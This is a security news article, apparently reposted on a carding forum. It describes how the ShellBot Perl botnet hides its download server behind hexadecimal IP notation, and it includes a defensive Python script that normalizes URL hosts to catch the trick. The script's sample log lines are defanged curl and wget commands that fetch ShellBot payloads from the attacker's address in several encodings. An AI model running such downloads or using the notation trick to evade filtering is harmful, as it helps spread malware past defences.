The ShellBot botnet uses hexadecimal IP addresses to evade detection

Carding 4 Carders

Professional
The malware keeps adapting, slipping past standard security controls.

The operators of the ShellBot botnet have started writing the malware's download URL with the server's IP address in hexadecimal notation. The bot is planted on Linux servers whose SSH logins have been brute-forced and is then used to run DDoS attacks.

A new report published today by the AhnLab Security Emergency response Center (ASEC) says: "The general order of actions of hackers remains the same, but the download URL used by attackers to install ShellBot has changed from a normal IP address to a hexadecimal value."

ShellBot, also known as PerlBot, breaks into servers with weak SSH credentials through a dictionary attack. The malware is used to run DDoS attacks and to deliver cryptocurrency miners.

Written in Perl, the bot uses the IRC protocol to communicate with its command-and-control (C2) server.

In the recently observed attacks the ShellBot download URL carries the server's address as a hexadecimal number instead of a dotted quad. For example, the URL "hxxp://0x2763da4e/" points at "hxxp://39.99.218.78/": split into bytes, 0x27.0x63.0xda.0x4e is 39.99.218.78 in decimal.

Because curl resolves the hexadecimal host exactly as it would the dotted-decimal one, the download succeeds, while signatures and blocklists that match only the conventional dotted-quad form of the address miss it. The switch therefore looks like a deliberate attempt to evade URL-based detection.

ASEC emphasizes: "Because curl is used for the download and, like web browsers, supports hexadecimal addresses, ShellBot can be successfully downloaded in a Linux environment and executed via Perl."
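The practical takeaway for detection is to normalize the host of every URL before matching it, rather than matching the literal string. The following Python is an added example, not code from the ASEC report or from ShellBot: it decodes the inet_aton-style host forms that curl and browsers accept (a single hex, decimal or octal number, or fewer than four dot-separated parts) back to a dotted quad and flags URLs that use any non-canonical form. It goes beyond the hexadecimal case in the article on purpose, because the same evasion works with decimal and octal notation. The log lines are constructed for the example and the regular expression also matches the defanged "hxxp" scheme used above.

```python
import ipaddress
import re

# Constructed sample log lines (not from the ASEC report). The first host is the
# one quoted in the article; the others are the same address in other notations.
SAMPLE_LOGS = [
    "curl -s hxxp://0x2763da4e/ -o /tmp/x",           # hexadecimal, single number
    "wget hxxp://39.99.218.78/ddos.pl",                # canonical dotted quad
    "curl hxxp://660855374/bot.pl",                    # decimal, single number
    "curl hxxp://0x27.0x63.0xda.0x4e/",                # hexadecimal per octet
    "curl hxxp://047.0143.0332.0116/",                 # octal per octet
    "curl hxxp://example.com/update.sh",               # hostname, not an IP
]

# Matches http/https and the defanged hxxp/hxxps schemes and captures the host.
URL_HOST_RE = re.compile(r"\bh(?:tt|xx)ps?://([^/\s:]+)", re.IGNORECASE)


def _component(s):
    """Parse one host component the way inet_aton does:
    0x-prefixed is hex, a leading 0 means octal, anything else is decimal."""
    s = s.lower()
    if s.startswith("0x"):
        return int(s[2:], 16)
    if len(s) > 1 and s.startswith("0"):
        return int(s, 8)
    return int(s, 10)


def normalize_ipv4(host):
    """Return the dotted-quad form of an inet_aton-style host (a, a.b, a.b.c or
    a.b.c.d with hex/octal/decimal parts), or None if it is not a numeric IPv4."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_component(p) for p in parts]
    except ValueError:
        return None
    # inet_aton semantics: every part but the last is one byte, the last part
    # fills all remaining bytes (so "0x2763da4e" alone covers all four).
    remaining = 4 - (len(nums) - 1)
    if any(not 0 <= n <= 255 for n in nums[:-1]):
        return None
    if not 0 <= nums[-1] < (1 << (8 * remaining)):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * remaining)) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def flag_obfuscated_ip_urls(lines):
    """Return (line, raw_host, dotted_quad) for every URL whose host is a numeric
    IPv4 address written in a form other than the canonical dotted quad."""
    hits = []
    for line in lines:
        for host in URL_HOST_RE.findall(line):
            dotted = normalize_ipv4(host)
            if dotted is not None and dotted != host:
                hits.append((line, host, dotted))
    return hits


if __name__ == "__main__":
    for line, host, dotted in flag_obfuscated_ip_urls(SAMPLE_LOGS):
        print(f"obfuscated IP host {host!r} -> {dotted}: {line}")
```

The decoding follows the rules of the classic inet_aton routine, which is why a single 32-bit number, octal components and mixed forms all come out as the same address; a rule that compares the normalized quad against a blocklist catches all of them, while a rule that greps for "39.99.218.78" catches only the second line.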

This development shows that ShellBot remains in active use against Linux systems. Since a compromised server can be used to install additional malware or to launch further attacks, ASEC recommends strong SSH passwords that are changed regularly. A more robust defence against the dictionary attack itself is to disable password authentication in sshd altogether and rely on key-based logins, with rate limiting or lockouts for repeated failures as a second layer.

Earlier, ASEC researchers uncovered a campaign that used abnormal certificates, with unusually long strings in the Subject Name and Issuer Name fields, to distribute the Lumma Stealer and RecordBreaker information stealers.

Returning to ShellBot, the campaign is a reminder that a trick as simple as rewriting a dotted-decimal IP address in hexadecimal is enough to slip past detection rules that match only the canonical form.

It underlines the need for detection logic that normalizes what it inspects, in this case the host of a URL, instead of matching literal strings, and for readiness to adapt as attacker tradecraft changes.